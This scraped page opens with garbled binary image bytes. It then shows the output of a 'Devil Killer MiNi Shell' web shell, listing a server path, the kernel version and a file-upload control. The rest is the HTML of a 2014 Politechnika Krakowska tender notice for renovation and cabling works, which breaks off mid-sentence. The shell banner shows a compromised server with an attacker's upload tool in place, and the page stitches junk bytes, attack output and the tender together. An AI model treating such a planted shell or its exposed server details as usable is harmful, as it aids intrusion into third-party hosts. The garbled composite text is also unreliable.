JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140730/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20140730/164863-N-2014.html

<p class="kh_header"><b>Kraków: Remont pomieszczeń w budynku 11-1 Wydziału Fizyki Matematyki i Informatyki Politechniki Krakowskiej ul. Podchorążych 1, oraz przebudowa instalacji słaboprądowych (bez części elektrycznej w sieci) w budynku 10-29 Wydziału Inżynierii Lądowej - L1 Politechniki Krakowskiej, ul. Warszawska 24</b><br>
<b>Numer ogłoszenia: 164863 - 2014; data zamieszczenia: 30.07.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Politechnika Krakowska im. Tadeusza Kościuszki Dział Zamówień Publicznych , ul. Warszawska 24, 31-155 Kraków, woj. małopolskie, tel. 12 628 26 56; 628 22 20, faks 12 6282072.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pk.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont pomieszczeń w budynku 11-1 Wydziału Fizyki Matematyki i Informatyki Politechniki Krakowskiej ul. Podchorążych 1, oraz przebudowa instalacji słaboprądowych (bez części elektrycznej w sieci) w budynku 10-29 Wydziału Inżynierii Lądowej - L1 Politechniki Krakowskiej, ul. Warszawska 24.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie 1 Remont pomieszczenia w budynku 11-1 Wydziału Fizyki Matematyki i Informatyki  Politechniki Krakowskiej ul. Podchorążych 1    w Krakowie  w zakresie wymiany instalacji elektrycznej i oświetlenia w sali  F 101 
Opis:  wymiana instalacji elektrycznej i oświetlenia w sali  F 101  obejmująca :
-  demontaż istniejących elementów instalacji elektrycznej 
-  wykonanie rozbiórek istniejącej boazerii 
-  wykonanie nowej tablicy rozdzielczej wraz z zasilaniem
-  wykonanie nowej instalacji światła i siły 
-  montaż nowych opraw oświetleniowych  
-  wykonanie  instalacji słaboprądowych (nagłośnienie, sieć strukturalna, sterowanie systemem   rolet, okablowaniem dla systemu SAP) zasilanie urządzeń multimedialnych wykonać na osobnych zabezpieczeniach/
-  wykonanie nowej katedry wraz z wyposażeniem 
-  wymiana drzwi /drzwi drewniane z ościeżnicą okleina naturalna,   przylgowe pełne, zamek   antypaniczny z okuciem klamka - klamka, 
-  montaż żaluzji okiennych z napędem elektrycznym  wraz z doprowadzeniem zasilania 
-  wykonanie sufitu  podwieszonego  o konstrukcji metalowej z wypełnieniem płytami z włókien   mineralnych 
-  malowanie ścian i sufitów
-  renowacja posadzki 
Minimalny wymagany okres gwarancji i rękojmi na montaż i instalacje    3 lata,  na urządzenia  gwarancja producenta , licząc od daty końcowego odbioru robót. 
Czas reakcji serwisu do  24 godzin. Wykonawca winien wadę lub usterkę usunąć w terminie  wyznaczonym przez Zamawiającego.
Termin wykonania zamówienia:  do 45 dni od daty przekazania placu budowy . Za termin zakończenia przedmiotu umowy uważa się datę podpisania protokołu odbioru końcowego
Zadanie 2 Remont pomieszczenia w budynku 11-1 Wydziału Fizyki Matematyki i Informatyki Politechniki Krakowskiej ul. Podchorążych 1 w Krakowie  w zakresie  wymiany oświetlenia w pom.  F201 
Opis:  Wymiana oświetlenia w pom.  F201 obejmująca :
- wymianę  opraw  oświetleniowych 
- wykonanie nowej instalacji światła
- wykonanie pomiarów 
Minimalny wymagany okres gwarancji i rękojmi na montaż i instalacje  
3 lata,  na urządzenia  gwarancja producenta , licząc od daty końcowego odbioru robót. 
Czas reakcji serwisu do  24 godzin. Wykonawca winien wadę lub usterkę usunąć w terminie  wyznaczonym przez Zamawiającego.
Termin wykonania zamówienia:  do 45 dni od daty przekazania placu budowy. Za termin zakończenia przedmiotu umowy uważa się datę podpisania protokołu odbioru końcowego
Zadania 2 Remont pomieszczeń w budynku 11-1 Wydziału Fizyki Matematyki i Informatyki Politechniki Krakowskiej ul. Podchorążych 1 w Krakowie
 Opis: Wymiana  drzwi do bocznych korytarzy I i II pietra strona zachodnia oraz do pomieszczeń F111, F112, F206/207 , WC I p w zakresie :
- demontaż istniejących drzwi
- dostawa i montaż nowych drzwi w PT 
- wykonanie  okładziny ościeży- szpalet /wg opisu PT/ - drewno twarde liściaste drzwi typ 2 i 3 /   
- dostawa i montaż okuć antypanicznych w drzwiach typu D1 i D2 
- wykonanie drobnych prac budowlanych / rozbiórki ścian, nadproża , zamurowania otworów  uzupełnienia tynków, malowanie, naprawa posadzki / po osadzeniu drzwi 
Minimalny wymagany okres gwarancji i rękojmi na wykonane   roboty budowlane  3 lata,  na stolarkę 7 lat, licząc od daty końcowego odbioru robót. 
Czas reakcji serwisu do  24 godzin. Wykonawca winien wadę lub usterkę usunąć w terminie  wyznaczonym przez Zamawiającego.
Termin wykonania zamówienia:  do 45 dni od daty przekazania placu budowy. Za termin zakończenia przedmiotu umowy uważa się datę podpisania protokołu odbioru końcowego
Zadanie 4 Przebudowa instalacji słaboprądowych (bez części elektrycznej w sieci) w budynku 10-29 Wydziału Inżynierii Lądowej - L1 Politechniki Krakowskiej, ul. Warszawska 24 w Krakowie, w ramach zadania inwestycyjnego: Przebudowa instalacji okablowania strukturalnego w bud. 10-29, WIL, ul. Warszawska 24 Kraków- Zadanie nr 4 
Opis: Przebudowa instalacji słaboprądowych (bez części elektrycznej w sieci) w budynku 10-29 Wydziału Inżynierii Lądowej - L1 Politechniki Krakowskiej, ul. Warszawska 24 w Krakowie w zakresie :
- tras kablowych oraz gniazd sieciowych
- szaf dystrybucyjnych oraz z wyposażeniem
- instalacji zasilania gniazd wtykowych dedykowanych w szafach
- robót budowlanych towarzyszących, demontaży, wywozy
Minimalny wymagany okres gwarancji i rękojmi na wykonane   roboty budowlane  3 lata,  na zamontowane urządzenia  gwarancja producenta , licząc od daty końcowego odbioru robót. 
Czas reakcji serwisu do  24 godzin. Wykonawca winien wadę lub usterkę usunąć w terminie  wyznaczonym przez Zamawiającego.
Wykonawca winien zapewnić nieodpłatny autoryzowany serwis zgodnie z warunkami gwarancji producenta urządzeń i wykonywać nieodpłatnie i własnym staraniem wszelkie przeglądy serwisowe wymagane przez producentów zainstalowanych urządzeń
Termin wykonania zamówienia: do 15 października 2014 roku. Za termin zakończenia przedmiotu umowy uważa się datę podpisania protokołu odbioru końcowego.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.31.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień.
 Ocena spełniania warunku udziału w postępowaniu będzie dokonana na podstawie złożonego oświadczenia z art. 22 ust. 1</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zadanie nr 1,2
Za posiadającego niezbędną wiedzę i doświadczenie uzna się Wykonawcę, który w ciągu ostatnich pięciu lat, a jeżeli okres wykonywania działalności jest krótszy - w tym okresie, wykonał  w obiekcie zabytkowym lub podlegającym  ochronie  konserwatora  zabytków co najmniej 2 roboty z których każda polegała na wykonaniu instalacji elektrycznej o wartości i rodzaju odpowiadającej robotom budowlanym stanowiącym przedmiot zamówienia.
Zadanie nr 3
Za posiadającego niezbędną wiedzę i doświadczenie uzna się Wykonawcę, który w ciągu ostatnich pięciu lat, a jeżeli okres wykonywania działalności jest krótszy - w tym okresie, wykonał  w obiekcie zabytkowym lub podlegającym  ochronie  konserwatora  zabytków co najmniej 2 roboty z których każda polegała na wykonaniu robót ogólnobudowlanych wraz z  wykonaniem, wymianą drzwi  drewnianych nietypowych , robionych  na zamówienie. 
Zadanie 4
Za posiadającego niezbędną wiedzę i doświadczenie uzna się Wykonawcę, który w ciągu ostatnich pięciu lat, a jeżeli okres wykonywania działalności jest krótszy - w tym okresie, wykonał  co najmniej 2 roboty budowlane, odpowiadające swoim rodzajem oraz wartością robotom budowlanym stanowiącym przedmiot zamówienia. Za roboty budowlane odpowiadające swoim rodzajem przedmiotowi zamówienia, Zamawiający uzna roboty polegające na budowie, przebudowie,  remoncie instalacji strukturalnych LAN wraz z szafami dystrybucyjnymi i wyposażeniem.
Wykaz robót należy przedstawić w Załączniku nr 4 do SIWZ. 
Do wykazu należy dołączyć dowody dotyczące najważniejszych robót, określające, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. 
Ocena spełniania warunku udziału w postępowaniu będzie dokonana na podstawie Wykazu robót - Załącznik nr 4 do SIWZ i dołączonych do niego dokumentów</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku szczegółowego w tym zakresie.           Ocena spełniania warunku udziału w postępowaniu będzie dokonana na podstawie złożonego oświadczenia z art. 22 ust. 1</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie zadania nr 1
Za dysponującego osobami zdolnymi do wykonania zamówienia uzna się Wykonawcę, który dysponuje lub będzie dysponował:
a)	kierownikiem budowy posiadającym: 
-	 uprawnienia budowlane bez ograniczeń do prowadzenia robót budowlanych w specjalności konstrukcyjno-budowlanej 
-	zaświadczenie konserwatorskie do prowadzenia robót w obiekcie zabytkowym, potwierdzone przez Wojewódzkiego Konserwatora Zabytków zgodnie z rozporządzeniem MK z dnia 9 czerwca 2004 roku w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i architektonicznych, a także innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych  i poszukiwań ukrytych lub porzuconych zabytków ruchomych (Dz. U. 04. 150   lub  udokumentowaną co najmniej 2 letnią praktykę zawodową na budowie przy   zabytkach nieruchomych wpisanych do rejestru zabytków 
-	oraz aktualne zaświadczenie o przynależności do Izby Inżynierów Budownictwa
b)	kierownikiem branży  sanitarnej posiadającym uprawnienia budowlane bez ograniczeń w zakresie instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych, oraz aktualne zaświadczenie o przynależności do Izby Inżynierów Budownictwa
c)	kierownikiem branży elektrycznej posiadającym uprawnienia budowlane bez ograniczeń w specjalności instalacyjnej w zakresie sieci instalacji i urządzeń elektrycznych oraz aktualne zaświadczenie o przynależności do Izby Inżynierów Budownictwa
W zakresie zadania nr 2
Za dysponującego osobami zdolnymi do wykonania zamówienia uzna się Wykonawcę, który dysponuje lub będzie dysponował:
a)	kierownikiem budowy posiadającym: 
-	 uprawnienia budowlane bez ograniczeń do prowadzenia robót budowlanych w specjalności konstrukcyjno-budowlanej 
-	zaświadczenie konserwatorskie do prowadzenia robót w obiekcie zabytkowym, potwierdzone przez Wojewódzkiego Konserwatora Zabytków zgodnie z rozporządzeniem MK z dnia 9 czerwca 2004 roku w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i architektonicznych, a także innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych  i poszukiwań ukrytych lub porzuconych zabytków ruchomych (Dz. U. 04. 150   lub  udokumentowaną co najmniej 2 letnią praktykę zawodową na budowie przy   zabytkach nieruchomych wpisanych do rejestru zabytków 
-	oraz aktualne zaświadczenie o przynależności do Izby Inżynierów Budownictwa
b)  kierownikiem branży elektrycznej posiadającym uprawnienia budowlane bez ograniczeń w specjalności instalacyjnej w zakresie sieci instalacji i urządzeń elektrycznych oraz aktualne zaświadczenie o przynależności do Izby Inżynierów Budownictwa
W zakresie zadania nr 3
Za dysponującego osobami zdolnymi do wykonania zamówienia uzna się Wykonawcę, który dysponuje lub będzie dysponował:
a)	kierownikiem budowy posiadającym: 
-	 uprawnienia budowlane bez ograniczeń do prowadzenia robót budowlanych w specjalności konstrukcyjno-budowlanej 
-	zaświadczenie konserwatorskie do prowadzenia robót w obiekcie zabytkowym, potwierdzone przez Wojewódzkiego Konserwatora Zabytków zgodnie z rozporządzeniem MK z dnia 9 czerwca 2004 roku w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i architektonicznych, a także innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych  i poszukiwań ukrytych lub porzuconych zabytków ruchomych (Dz. U. 04. 150   lub  udokumentowaną co najmniej 2 letnią praktykę zawodową na budowie przy   zabytkach nieruchomych wpisanych do rejestru zabytków 
-	oraz aktualne zaświadczenie o przynależności do Izby Inżynierów Budownictwa
W zakresie zadania nr 4
Za dysponującego osobami zdolnymi do wykonania zamówienia uzna się Wykonawcę, który dysponuje lub będzie dysponował:
a)	kierownikiem branży elektrycznej posiadającym uprawnienia budowlane bez ograniczeń w specjalności instalacyjnej w zakresie sieci instalacji i urządzeń elektrycznych oraz aktualne zaświadczenie o przynależności do Izby Inżynierów Budownictwa
Ocenę spełniania warunku udziału w postępowaniu zamawiający przeprowadzi na podstawie załączonego do oferty wykazu osób - wg załączonego wzoru  załącznik nr 5 do SIWZ oraz oświadczenia - zał. nr 5 a.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie zadań od  nr 1 do  3
Za znajdującego się w sytuacji ekonomicznej i finansowej zapewniającej 
wykonanie zamówienia uzna się Wykonawcę, który na dzień składania ofert 
jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej 
działalności gospodarczej związanej z przedmiotem zamówienia na kwotę 
minimum 100 000 złotych

W zakresie zadania  nr 4
Za znajdującego się w sytuacji ekonomicznej i finansowej zapewniającej 
wykonanie zamówienia uzna się Wykonawcę, który na dzień składania ofert 
jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej 
działalności gospodarczej związanej z przedmiotem zamówienia na kwotę 
minimum 200 000 złotych
Ocena spełniania warunków udziału w postępowaniu będzie dokonana na 
podstawie załączonych dokumentów</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony Formularz oferty - Załącznik nr 2 do SIWZ
Kosztorys ofertowy z ilościami, cenami jednostkowymi robót, podstawami nakładów wraz z zestawieniem wszystkich materiałów, z podaniem dokładnych ich nazw handlowych, ilości i cen jednostkowych - wydruk w wersji uproszczonej.
Kosztorys ofertowy należy złożyć wraz z jedną kopią spiętą oddzielnie oraz w
wersji elektronicznej na płycie CD w wersji oryginalnych plików w programie
kosztorysowym np. Norma, Rodos lub Zuzia lub w plikach możliwych do
wczytania w przynajmniej jednym z podanych programów (np. format xml, ath,
zuz, rds). Uwaga: kopia kosztorysu powinna zostać opatrzona napisem
KOPIA 
Zobowiązanie innych podmiotów do udostępnienia zasobów (w oryginale) - załącznik nr 9 do SIWZ ( jeśli dotyczy )
Opcjonalnie, jeśli występuje pełnomocnik - pełnomocnictwo (w oryginale lub notarialnie potwierdzonej kopii) dla osoby reprezentującej w niniejszym postępowaniu Wykonawcę lub pełnomocnictwo dla osoby lub podmiotu reprezentującego kilku Wykonawców składających ofertę wspólną</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Wszelkie zmiany treści umowy mogą być dokonywane wyłącznie w formie aneksu podpisanego przez obie strony, pod rygorem nieważności. Zmiany nie mogą naruszać postanowień zawartych w art. 144 ust. 1 Prawa zamówień publicznych.
2.	Zamawiający przewiduje możliwość dokonania zmian umowy w stosunku do treści oferty, w szczególności:
1)	Terminu realizacji przedmiotu zamówienia w przypadkach:
a)	realizacji w drodze odrębnej umowy prac powiązanych z przedmiotem niniejszej umowy, wymuszającej konieczność skoordynowania prac,
b)	wystąpienia konieczności wykonania zamówienia dodatkowego, w rozumieniu art. 67 ust. 1 pkt 5 ustawy Prawo zamówień publicznych, którego realizacja  będzie miała wpływ na termin wykonania robót objętych niniejszą umową, 
c)	wstrzymania robót  przez właściwe organy administracji publicznej na podstawie przepisów Prawa budowlanego,
d)	niedotrzymania przez Zamawiającego warunków umowy: opóźnienia, utrudnienia, zawieszenia robót lub przeszkodami dającymi się przypisać Zamawiającemu, 
e)	konieczności wprowadzenia zmian na etapie wykonawstwa robót z przyczyn niezależnych od obu stron,
f)	wystąpienia istotnych wad lub braków w dokumentacji projektowej mających wpływ na termin realizacji przedmiotu umowy,
g)	następstwem wprowadzania zmian w obowiązujących przepisach prawnych mających wpływ na realizację przedmiotu zamówienia,
h)	następstwem działania organów administracji lub innych podmiotów, związanych z przekroczeniem obowiązujących terminów wydawania lub odmowy wydania decyzji, zezwoleń, uzgodnień,
i)	gdy zaistnieje inna, niemożliwa do przewidzenia w momencie zawarcia umowy okoliczność prawna, ekonomiczna lub techniczna, za którą żadna ze Stron nie ponosi odpowiedzialności, skutkująca brakiem możliwości należytego wykonania umowy w terminie umownym, zgodnie ze specyfikacją istotnych warunków zamówienia.
Zaistnienie przeszkód w wykonywaniu robót powinno być potwierdzone 	pismem.
Termin wykonania przedmiotu zamówienia ulega przesunięciu o okres wynikający z przerw lub opóźnień rozpoczęcia prac. Wykonawca nie będzie uprawniony do przedłużenia terminu wykonania umowy i zwiększenia wynagrodzenia, jeżeli konieczność dokonania zmiany została spowodowana przez jakikolwiek błąd lub opóźnienie ze strony Wykonawcy, włącznie z błędem lub opóźnionym dostarczeniem jakiegokolwiek dokumentu wynikającego z obowiązków Wykonawcy. 
2)	materiałów zaoferowanych w ofercie, z powodu:
a)	niedostępności na rynku materiałów wskazanych w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót spowodowanej zaprzestaniem produkcji lub  wycofaniem z rynku tych materiałów,
b)	pojawienia się na rynku materiałów nowszej generacji pozwalających na zaoszczędzenie kosztów realizacji przedmiotu umowy lub kosztów eksploatacji wykonanego przedmiotu umowy, lub umożliwiających uzyskanie lepszej jakości robót.
Każdorazowo na taką zmianę musi wyrazić zgodę Inspektor Nadzoru. 
3)	Konieczności zastosowania robót zamiennych z powodu:
a)	uz</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
